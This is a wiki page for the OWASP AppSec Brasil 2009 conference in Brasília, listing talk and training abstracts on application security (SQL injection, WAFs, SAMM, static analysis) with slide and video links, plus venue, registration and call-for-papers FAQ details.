<br> '''Making a Case for Data Security to Network-Centric Peers and Managers and Leveraging Web Application Firewalls (WAF) and Database Activity Monitoring (DAM) to Augment Secure Coding &amp; Review Practices''' <br />
<br />
''Brian Contos'', Imperva <br />
<br />
Information system security has changed. The days of being focused on network security measures, operating system vulnerabilities, and open ports, while still important, is no longer the main concern for most organizations. Today, the attackers – organized crime, competitors, nation-states, and malicious insiders are going after the assets that process and store data: applications and databases. The criminals are already fighting the fight on this front. In response, organizations are deploying new defenses - adopting application and data security countermeasures that allow them to protect, monitor and respond to nefarious activity. <br />
<br />
[http://www.owasp.org/images/f/f6/OWASP_Brian_Contos_Making_a_Case_for_Data_Security_to_Network-Centric_Peers_and_Managers_October2009_Final.zip Slides]<br> <br />
<br />
<br> '''OWASP ROI: Optimize Security Spending using OWASP''' <br />
<br />
''Matt Tesauro'' <br />
<br />
Considering the current economic times, security spending is tighter than ever. This presentation will cover the Open Web Application Security Project (OWASP) projects and how they can improve your application security posture in a budgetfriendly way. OWASP is an open community dedicated to enabling organizations to develop, purchase, and maintain applications that can be trusted. The OWASP Foundation is a notforprofit entity and provides unbiased, practical, costeffective information about application security. Projects covered include the OWASP Top 10, OWASP Testing Guide, OpenSAMM Enterprise Security API (ESAPI), Application Security Verification Standard (ASVS), Application Security Desk Reference (ASDR) and others. A case study of a specific company's success with implementing OWASP methodologies and tools will also be provided. In this case study, the company realized a saving of nearly $400,000 in year one. <br />
<br />
[http://www.owasp.org/images/d/db/AppSec_Brazil_OWASP_ROI-mtesauro.pdf Slides]<br> [http://vimeo.com/7461624 Video] <br />
<br />
<br> '''Software Assurance Maturity Model (SAMM)''' <br />
<br />
''Pravir Chandra'', Fortify <br />
<br />
The Software Assurance Maturity Model (SAMM) (http://www.opensamm.org) is a flexible and prescriptive framework for building security into a software development organization. Covering more than typical SDLC-based models for security, SAMM enables organizations to self-assess their security assurance program and then use recommended roadmaps to improve in a way that's aligned to the specific risks facing the organization. Beyond that, SAMM enables creation of scorecards for an organization's effectiveness at secure software development throughout the typical governance, development, and deployment business functions. Scorecards also enable management within an organization to demonstrate quantitative improvements through iterations of building a security assurance program. This workshop will introduce the SAMM framework and walk through useful activities such as assessing an assurance program, mapping an existing organization to a recommended roadmap, and iteratively building an assurance program. Time allowing, additional case studies will also be discussed. SAMM is an open a free project and has recently been added under the Open Web Application Security Project (OWASP). <br />
<br />
[http://www.opensamm.org/downloads/OpenSAMM-1.0.ppt Slides]<br> [http://vimeo.com/7461495 Video] <br />
<br />
<br> <br />
<br />
'''SQL Injection: Amplifying Data Lekeage'''<br> <br />
<br />
''Ulisses Castro'' <br />
<br />
Talk about how some SQL Injection techniques works and how they can be more effective when mixin with some available database native functions. <br />
<br />
The main idea is how you can amplifying the amount of data that is downloaded per request to the web server.<br> <br />
<br />
Slides<br>[http://vimeo.com/7460521 Video] <br />
<br />
<br> '''Automated SQL Ownage Techniques''' <br />
<br />
''Sebastian Cufre'', Core Security <br />
<br />
This talk is about web application security assessment. In particular, in this talk we set to improve the assessment process for SQL injection vulnerabilities by providing the means to discard exogenous "false positive" alarms and confirm exploitable vulnerabilities. <br />
<br />
We propose a black-box technique to detect and exploit SQL injection vulnerabilities. The exploitation provides an interface to execute arbitrary SQL code through them. Therefore, we are able to thoroughly assess the impact of the vulnerability (e.g., understand what a hacker can do). <br />
<br />
The core of this talk is in examining the difficulties that appear while trying to expose vulnerability and how to do a black-box interaction to automatically construct an exploit. <br />
<br />
[http://www.owasp.org/images/3/3a/OWASP_Brasil_2009_-_Automated_SQL_Ownage_Techniques.pptx Slides]<br> [http://vimeo.com/7462181 Video] <br />
<br />
<br> '''Praticas e ferramentas fundamentais para o desenvolvimento de software seguro (''Tools and Practices for Secure Software Development'')''' <br />
<br />
''Cassio Goldschmidt'', Symantec <br />
<br />
Implementing a security program for the whole application life cycle can be a daunting and costly task. So, in the development of this talk, we will demonstrate how it is possible to lessen the risk of this program, using high quality resource freely available on the Internet and studying the practices considered fundamental by SAFECode members (EMC, Juniper, Microsoft, Nokia, SAP, symantec). <br />
<br />
[http://www.owasp.org/images/5/55/Praticas_e_ferramentas_fundamentais_para_o_desenvolvimento_de_software_seguro_-_AppSec_Brasil.pptx Slides]<br> [http://vimeo.com/7461207 Video] <br />
<br />
<br> '''Abordagem Preventiva para Teste de Segurança em Aplicações Web (''Preventive Approach for Web Application Security Testing'')''' <br />
<br />
''Luiz Otávio Duarte, Ferrucio de Franco Rosa, Walcir M. Cardoso Jr.'', CTI/MCT <br />
<br />
The objetive of this lecture is to present the approach used by CTI (Renato Archer Information Technology Center, institution under the Brazilian Ministry of Science and Technology) for security testing of web applications. The presentation is organized as follows: First, an introduction will be presented, including important concepts, motivation, statistics and most critical vulnerabilities nowadays. <br />
<br />
Later will be shown techniques for software testing and techniques for software security testing. Then we show the approach used by CTI to security testing web application such as inspection of source code, use of regular expressions and vulnerability detection techniques. A pratical demonstration will be presented after the approach overview. <br />
<br />
The presentation will be finalized with conclusions and recommendations of best practices for security testing web applications. <br />
<br />
[http://www.owasp.org/images/8/8c/AprOwasp_LOD_FER_WAL_NewVersion.pdf Slides]<br> [http://vimeo.com/7460959 Video] <br />
<br />
<br> '''ModSecurity: Firewall OpenSource para Aplicações Web (WAF) (''ModSecurity, Open Source Web Application Firewall'')''' <br />
<br />
''Klaubert Herr da Silveira'' <br />
<br />
With the growing complexity and importance of web applications, short development schedule, new attack techniques and the lack of attention and/or focus of developer with security, regulations and the seek for best practices, is necessary add a new layer of security to web applications, the "web applications firewalls" or WAF's. This talk will show the concepts of WAF, specially of ModSecurity, open source web application firewall, a powerful and complex tool, designed to understand and protect the web applications of many types, Will be presented their functionalities, and how it can help the day-by-day of a web site, for monitoring, protection or even as a troubleshooting tool for web application. <br />
<br />
[http://www.owasp.org/images/d/d6/OWASP_BSB_ModSecurity_Klaubert-Herr.ppt Slides]<br> [http://vimeo.com/7462060 Video] <br />
<br />
<br> '''Programação Segura utilizando Análise Estática (''Secure Programming with Static Analysis'')''' <br />
<br />
''Philippe Sevestre'', LeadComm <br />
<br />
Creating secure code requires more than just good intentions. Programmers need to know how to make their code safe in an almost infinite number of scenarios and configurations. Static source code analysis gives users the ability to review their work with a fine-tooth comb and uncover the kinds of errors that lead directly to vulnerabilities. This talk frames the software security problem and shows how static analysis is part of the solution. <br />
<br />
We will look at how static analysis works, how to integrate it into the software development processes, and how to make the most of it during security code review. Along the way we'll look at examples taken from real-world security incidents, showing how coding errors are exploited, how they could have been prevented, and how static analysis can rapidly uncover similar errors. <br />
<br />
[http://www.owasp.org/images/a/aa/AppSec_Brasil_2009-SecureProgrammingWithStaticAnalysis.pdf Slides]<br> [http://vimeo.com/7461756 Video] <br />
<br />
<br> <br />
<br />
==== Training Sessions ====<br />
<br />
'''Risk Management Applied to Web Services''' <br />
<br />
''José Eduardo Malta de Sá Brandão'', IPEA <br />
<br />
<span style="color: rgb(255, 0, 0);">This course will be in Portuguese only.</span> <br />
<br />
Date: Oct 27<br> Time: Morning <br />
<br />
This training will present the risk management discipline regarding web services. The course focus will show concepts and systematize this discipline, exemplifying with a case study to reinforce the utility and need of using these methodology to understand and develop web services. The course should provide its students the knowledge to develop their own risk management projects. The presentation will show concepts, models and compare the main standards related to security risk management. <br />
<br />
[http://www.owasp.org/images/4/41/Owasp2009_brandao.ppt Slides] <br />
<br />
<br> '''Web Security: Techniques for Secure Application Programming''' <br />
<br />
''André Ricardo Abed Grégio e Vitor Monte Afonso'', CTI/MCT, ''Paulo Licio de Geus'', IC/UNICAMP <br />
<br />
<span style="color: rgb(255, 0, 0);">This course will be in Portuguese only.</span> <br />
<br />
Date: Oct 28<br> Time: afternoon <br />
<br />
This course aims to present the principles and techniques of secure programming, specially web application programming, showing fundamental concepts and detailing the vulnerabilities which could be explored and focusing on the methods to mitigate those faults. We will present some examples of how some OWASP Top Ten vulnerabilities can be corrected in different programming languages, with code vulnerable snippets from code reviews conducted by the training authors. Some tools for detecting attacks and web application vulnerability testing will be presented. <br />
<br />
[http://www.owasp.org/images/9/9f/AppSecBR2009_VAfonso_AGregio_PGeus.pdf Slides] <br />
<br />
<br> '''Computational Security in Web Service Development''' <br />
<br />
''Júlio Cesar Estrella et al'', ICMC/USP <br />
<br />
<span style="color: rgb(255, 0, 0);">This course will be in Portuguese only.</span> <br />
<br />
Date: Oct 28<br> Time: all day <br />
<br />
This training session will present the development of distributed applications using the concept of SOA and considering its computational security. For the development of the client and server applications, we will use the Apache Axis2 engine. The basic components of Axis2 will be presented, as well as the web service invocation types and models, and their main characteristics. Two web service security standards will be seen in the context of the Apache Axis2 engine: WS-Security and SAML. The methodology used for this training session includes theory and practice, touching the fundamental concepts of the Axis2 engine and the construction of real applications with focus on security. <br />
<br />
<br> '''Security Technologies in Web Services''' <br />
<br />
''Eduardo Takeo Ueda e Wilson Vicente Ruggiero'', Poli/USP <br />
<br />
<span style="color: rgb(255, 0, 0);">This course will be in Portuguese only.</span> <br />
<br />
Data: Oct 28<br> Time: morning <br />
<br />
Due to their integration characteristics and because they use open standards, web services have become an area of great interest to academics and industry. Firstly, we will introduce the basic concepts of a service oriented architecture, so the training can be self sufficient. After, we will present the main security standards and specifications in development and which must be adopted for web services. Lastly, the training ends with an exposition of the current challenges in web service security. <br />
<br />
<br> '''Hands on Web Application Testing using the OWASP Testing Guide.''' <br />
<br />
''Matt Tesauro'', OWASP <br />
<br />
Date: Oct 27 and 28 (2 days)<br> Time: all day <br />
<br />
The training will cover the critical areas of web application testing using the OWASP Testing Guide v3 as the framework for testing an application and the OWASP Live CD for the tools to test with. A custom version of the OWASP Live CD will be created for the training. It will include a self-contained testing environment providing vulnerable applications so that both tools and the applications to test them on are provided. <br />
<br />
<span style="color: rgb(255, 0, 0);">This course requires a laptop for the hands-on activities. Each student should bring its own laptop.</span> <br />
<br />
[http://www.owasp.org/images/9/97/Matt.tesauro.hands.on.zip Slides] <br />
<br />
==== Venue ====<br />
<br />
[[Image:CongressoNacional.jpg|The Palácio do Congresso building]] <br />
<br />
The event will be held in Brasília, Brazil's Capital at: Câmara dos Deputados, Anexo II, Praça dos Três Poderes. <br />
<br />
You can check the location at [http://maps.google.com/maps?f=q&source=s_q&hl=pt-BR&geocode=&q=anexo+II,+camara+dos+deputados,+brasilia&sll=37.0625,-95.677068&sspn=43.934478,79.101563&ie=UTF8&t=h&ll=-15.800058,-47.865822&spn=0.01309,0.019312&z=16 Google Maps] <br />
<br />
'''Training Sessions''' <br />
<br />
All training sessions will happen in the Deputy Chamber Cororate University (CEFOR), which is located at the following address: <br />
<br />
Centro de Formação, Treinamento e Aperfeiçoamente da Câmara dos Deputados, via N3, Projeção L, Setor de Garagens Ministeriais Norte, Complexo Avançado da Câmara dos Deputados, Bloco B. <br />
<br />
Check its location on [http://maps.google.com.br/maps/ms?ie=UTF8&hl=pt-BR&msa=0&ll=-15.793895,-47.864009&spn=0.005017,0.006866&t=h&z=17&msid=106468407154665154285.0004577c477849eda80f3 this map]. <br />
<br />
''How to get there'' <br />
<br />
We are trying to provided a transfer from somewhere in the ''Esplanada dos Ministérios'', which is accessible by bus. Any new information on this will be posted in this page. <br />
<br />
To go by taxi, show the map to the driver. It is improbable tha any taxi driver will be able to get you to the training sessions location just by reading is address. With the map, arriving to the location is quite easy and fast from any downtown location. <br />
<br />
We strongly recommend against getting to the trainings in your own car, as it is very difficult to find unused parking slots in this part of town. <br />
<br />
==== Registration ====<br />
<br />
'''Registration and Conference Fees''' <br />
<br />
There will be no fees for this conference, only '''registration''' is required to participate. The registration form can be found [http://www2.camara.gov.br/eventos/appsec-brasil-2009-confer.-inter.-de-seguranca-de/inscricao here]. <br />
<br />
The training session registration form can be found [https://creator.zoho.com/lucas.ferreira/appsec-mini-cursos/ here] <br />
<br />
==== Committees ====<br />
<br />
'''Conference Committee''' <br />
<br />
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org <br />
<br />
2009 AppSec Brasil Program Committee (appsec.brasil@camara.gov.br): <br />
<br />
*Conference Chair: Lucas C. Ferreira (lucas.ferreira at owasp.org) <br />
*Tutorials Organization: Eduardo V. C. Neves (eduardo.neves at owasp.org) <br />
*Tracks Organization: Wagner Elias (wagner.elias at owasp.org)<br />
<br />
Organization Team <br />
<br />
*Cassio Goldschmidt (cassio 'at' owasp.org) <br />
*Kuai Hinojosa (kuai.hinojosa 'at' owasp.org) <br />
*Leonardo Cavallari - (leo.cavallari 'at' owasp.org) <br />
*Thiago Lechuga (thiagoalz 'at' gmail.com) <br />
*Dinis Cruz (dinis.cruz 'at' owasp.org)<br />
<br />
<br> <br />
<br />
==== Links and other information ====<br />
<br />
Event page on LinkedIn: http://events.linkedin.com/OWASP-AppSec-Brasil/pub/65160 <br />
<br />
==== FAQ ====<br />
<br />
'''Q. Who is promoting the conference?''' <br />
<br />
A. This conference is being supported and organized by the [http://www.ticontrole.gov.br TI-Controle Community] and the [http://www.camara.gov.br Deputy Chamber], with the contents (presentations, keynotes, training, etc) selected by the OWASP [[Brazilian]] Chapter. <br />
<br />
'''Q. What will it cost?''' <br />
<br />
A. Nothing. Thanks to its sponsor, the conference will be free of charge. However we have limited seats, so please register early. <br />
<br />
<br> '''''Call For Papers''''' <br />
<br />
'''Q. What is the Open Web Application Security Project (OWASP)?''' <br />
<br />
The Open Web Application Security Project (OWASP) is a worldwide free and open community focused on improving the security of application software. Our mission is to make application security visible, so that people and organizations can make informed decisions about true application security risks. Everyone is free to participate in OWASP and all of our materials are available under a free and open software license. The OWASP Foundation is a 501c3 not-for-profit charitable organization that ensures the ongoing availability and support for our work with your support. <br />
<br />
'''Q. How many speaking slots are there?''' <br />
<br />
Please see the Conference Agenda in its [http://www.owasp.org/index.php/AppSec_Brasil_2009 main page]. <br />
<br />
'''Q. What are the submission deadlines?''' <br />
<br />
The CFP submission deadline is July 11th, with the final version of the presentation material due September 15th 2009. <br />
<br />
'''Q: Who is allowed to submit presentations?''' <br />
<br />
A: Original authors may submit presentations for consideration. Third party representatives such as PR firms or Speaker Representatives MAY NOT submit materials on behalf of a potential speaker. <br />
<br />
'''Q: Why aren't Third Parties such as PR Firms allowed to submit presentations?''' <br />
<br />
A: Due to potential copyright and intellectual property liability issues as well as the need for OWASP to have direct contact with potential and selected presenters to expedite selection and deliverable materials, we require that only original authors of presentations submit for the Call for Papers. Third party representatives such as PR firms or Speaker Representatives MAY NOT submit materials on behalf of a potential speaker. <br />
<br />
'''Q: Are there any restrictions on the content of the presentations?''' <br />
<br />
A: Yes, all presentations must respect the rules defined in the OWASP [[Speaker Agreement]]. <br />
<br />
'''Q: How long will I have to wait before I am notified if I have been accepted or denied?''' <br />
<br />
A: Submitters will be notified of the status (acceptance or denial) on August 7th 2009. <br />
<br />
'''Q. Is there an honorarium for presenters?''' <br />
<br />
No. OWASP is committed to making its conferences available to the widest possible audience. In order to do this OWASP keeps the entrance free for the AppSec Brazil 2009 to make the conference accessible. As a result we are unable to provide a monetary honorarium but we welcome our speakers as our guests to the conference where they can network with other security professionals. We will provide lodging and domestic air travel for one presenter for each selected work. <br />
<br />
'''Q: I have been accepted. What are the materials that I have to turn in and what are the deadlines?''' <br />
<br />
A: The following is a list of materials that are required from each accepted presentation. Failure to proceed these materials by the deadlines set forth for the event the presentation was accepted for will result in cancellation of acceptance. <br />
<br />
*A confirmed [[Speaker Agreement|Speaker Agreement]] (July 15th 2009) <br />
*Presentation in PowerPoint or Keynote format using the [http://www.owasp.org/images/5/54/Presentation_template.ppt OWASP Template] (September 15th 2009) <br />
*Detailed Bibliography of resources, co-authors, etc. (September 15th 2009) <br />
*Optional White Paper for inclusion on CD (September 15th 2009)<br />
<br />
'''Q: Do I have to submit a White Paper?''' <br />
<br />
A: No. We would certainly appreciate any White Papers that can be included on the conference web site but they are not required. If you have written an existing white paper to go along with your presentation, please submit it with your CFP submission. Submissions with attached White Papers will receive additional consideration. <br />
<br />
'''Q: What if I have a co-author who is not presenting. How do I cite the person(s)?''' <br />
<br />
A: All co-authors and works that have been used should be cited in a detailed bibliography that will be published on the Conference CD. <br />
<br />
'''Q: I have been accepted and would like to add co-presenters. Can I still do this?''' <br />
<br />
A: No. Co-presenters should have been added at the time that the Presentation was submitted. They may attend the conference and present if they register as any other participant. <br />
<br />
'''Q: My PR company/friends/co-workers/family would like to come see me give my presentation. Will they be allowed in for free?''' <br />
<br />
A: Yes, but they need to register on the conference web site as any other conference participant. <br />
<br />
'''Q. I have more questions''' <br />
<br />
A: Email appsec.brasil@camara.gov.br concerning this event. <br />
<br />
<br> __NOTOC__ <headertabs /> <br />
<br />
[[Category:OWASP_AppSec_Conference]]</div>
Ulisses Castro